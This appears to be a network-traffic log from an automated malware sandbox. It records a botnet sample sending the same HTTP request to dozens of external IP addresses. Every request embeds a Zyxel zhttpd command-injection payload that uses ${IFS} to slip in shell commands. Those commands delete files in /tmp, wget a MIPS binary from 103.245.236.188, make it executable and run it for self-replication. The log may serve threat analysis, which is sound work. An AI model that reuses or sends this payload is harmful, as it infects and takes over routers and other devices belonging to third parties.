                                                Jan 12, 2024 18:16:43.934101105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9527192.168.2.233681883.72.214.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.934134007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9528192.168.2.2343698190.157.53.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.934165955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9529192.168.2.234925638.4.229.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.934186935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9530192.168.2.2348966193.113.87.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.934223890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9531192.168.2.2359268148.183.128.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.934261084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9532192.168.2.233640854.238.72.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.934324026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9533192.168.2.235868217.10.223.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.934356928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9534192.168.2.235522062.162.127.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.934408903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9535192.168.2.2341114158.178.110.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.934463978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9536192.168.2.2336000186.246.252.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.934495926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9537192.168.2.2360118159.123.86.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.934546947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9538192.168.2.2343580112.25.131.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.934551001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9539192.168.2.2357930109.54.216.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.934586048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9540192.168.2.2340792143.9.120.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.934657097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9541192.168.2.2339826196.16.205.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.934696913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9542192.168.2.235660274.73.128.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.934709072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9543192.168.2.2345760137.131.34.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.934864044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9544192.168.2.234398036.84.144.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.934864998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9545192.168.2.2342138133.134.26.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.934864998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9546192.168.2.2338066194.112.68.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.934865952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9547192.168.2.2358410203.215.85.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.934875011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9548192.168.2.235961660.202.69.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.934916973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9549192.168.2.235483438.92.186.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.934919119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9550192.168.2.2336790201.122.157.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.934997082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9551192.168.2.233445836.36.173.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935070038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9552192.168.2.233429032.58.138.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935076952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9553192.168.2.234555248.45.245.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935108900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9554192.168.2.2342284178.2.166.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935228109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9555192.168.2.234719648.195.5.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935228109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9556192.168.2.235259661.63.123.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935230017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9557192.168.2.2340326123.66.174.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935236931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9558192.168.2.2338780131.120.107.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935271025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9559192.168.2.235082666.234.175.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935273886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9560192.168.2.233924627.248.181.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935405970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9561192.168.2.234926093.121.177.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935461998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9562192.168.2.2343914181.38.40.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935463905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9563192.168.2.2350784195.207.26.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935463905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9564192.168.2.2337582106.215.172.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935462952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9565192.168.2.234310643.252.146.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935463905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9566192.168.2.2342750158.44.160.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935518980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9567192.168.2.235509275.188.149.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935518980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9568192.168.2.2354270123.65.62.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935609102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9569192.168.2.23541768.83.193.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935669899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9570192.168.2.2352540169.143.51.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935699940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9571192.168.2.2345500159.170.43.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935699940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9572192.168.2.233494649.113.255.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935714006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9573192.168.2.234368083.80.107.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935717106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9574192.168.2.2342798155.89.119.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935724020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9575192.168.2.2333668134.62.86.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935873985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9576192.168.2.2342086108.223.171.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935892105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9577192.168.2.2346556188.246.210.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935904026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9578192.168.2.2340200207.79.68.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935904026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9579192.168.2.2340538141.190.74.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935921907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9580192.168.2.2337654106.155.165.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935921907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9581192.168.2.2350666184.93.234.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935933113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9582192.168.2.2343288172.57.84.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935933113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9583192.168.2.235053268.17.68.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935949087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9584192.168.2.2350654177.147.102.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.935976982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9585192.168.2.2358782186.94.138.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.936075926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9586192.168.2.2353326170.115.243.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.936093092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9587192.168.2.2350498183.48.53.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.936093092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9588192.168.2.235466817.21.82.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:43.936121941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9589192.168.2.2346980183.236.36.222443
                                                TimestampBytes transferredDirectionData
